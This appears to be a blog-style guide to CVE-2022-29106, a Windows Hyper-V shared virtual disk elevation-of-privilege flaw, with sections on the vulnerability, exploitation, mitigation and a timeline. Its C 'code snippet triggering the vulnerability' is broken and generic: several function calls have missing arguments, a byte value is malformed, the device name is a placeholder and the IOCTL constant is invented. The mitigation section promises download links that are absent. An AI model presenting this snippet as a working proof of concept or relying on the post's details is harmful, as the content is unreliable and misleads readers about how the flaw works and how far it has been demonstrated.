CVE-2022-29106 - Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability: A Comprehensive Guide

In this post, we will explore a recently discovered Windows Hyper-V vulnerability: CVE-2022-29106. An elevation of privilege vulnerability exists in the way that the Windows Hyper-V Shared Virtual Disk (SVD) system handles certain requests. We will discuss the details of this vulnerability, its possible exploits, and the ways to mitigate the risks associated with it.

Microsoft has acknowledged this vulnerability and has released security updates to address the issue. We will also discuss these updates and provide links to the original references for you to understand the problem better and take any necessary actions to protect your systems.

The Vulnerability

CVE-2022-29106 is an elevation of privilege vulnerability in the Windows Hyper-V (type-1) hypervisor when it handles certain requests in a shared virtual disk (SVD) environment.

A successful exploit of this vulnerability could allow the attacker to execute arbitrary code on the host operating system with elevated privileges, potentially leading to complete control of the compromised system.

Reference: Microsoft Security Advisory CVE-2022-29106

Exploit Details

To exploit this vulnerability, an attacker would need to have access to an affected virtual machine (VM), which is sharing a virtual disk with other VMs on the same Hyper-V host.

The attacker could then send specially crafted requests to the shared virtual disk, causing the Hyper-V host to improperly validate the requests. This could, in turn, allow the attacker to execute arbitrary code on the host operating system with elevated privileges.

Here's an example of a code snippet triggering the vulnerability

#include <windows.h>
#include <stdio.h>

int main()
{
  HANDLE hDevice;
  DWORD dwReturn;

  hDevice = CreateFile("\\\\.\\YourSharedVirtualDisk", GENERIC_READ|GENERIC_WRITE, , NULL, OPEN_EXISTING, , NULL);
  if (hDevice == INVALID_HANDLE_VALUE)
  {
    printf("[-] Could not open the shared virtual disk device. Error: %d\n", GetLastError());
    return 1;
  }
 
  BYTE payload[1024];
  memset(payload, x41, sizeof(payload));

  DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, payload, sizeof(payload), NULL, , &dwReturn, NULL);

  CloseHandle(hDevice);
  return ;
}

Mitigation

To mitigate this vulnerability, Microsoft has released security updates for the affected products. It is advised to apply these updates immediately to protect your systems.

Here are the links to download the security updates

- Windows Server 2019
- Windows Server, version 1803
- Windows Server, version 1903
- Windows Server, version 1909
- Windows Server, version 2004
- Windows Server, version 20H2

Conclusion

CVE-2022-29106 is a severe vulnerability affecting the Windows Hyper-V host systems, specifically in the shared virtual disk environment. It is essential to apply the security updates provided by Microsoft to protect your systems from potential exploits.

Stay informed and make sure to keep your systems updated to mitigate such threats.

Timeline

Published on: 05/10/2022 21:15:00 UTC
Last modified on: 05/19/2022 20:35:00 UTC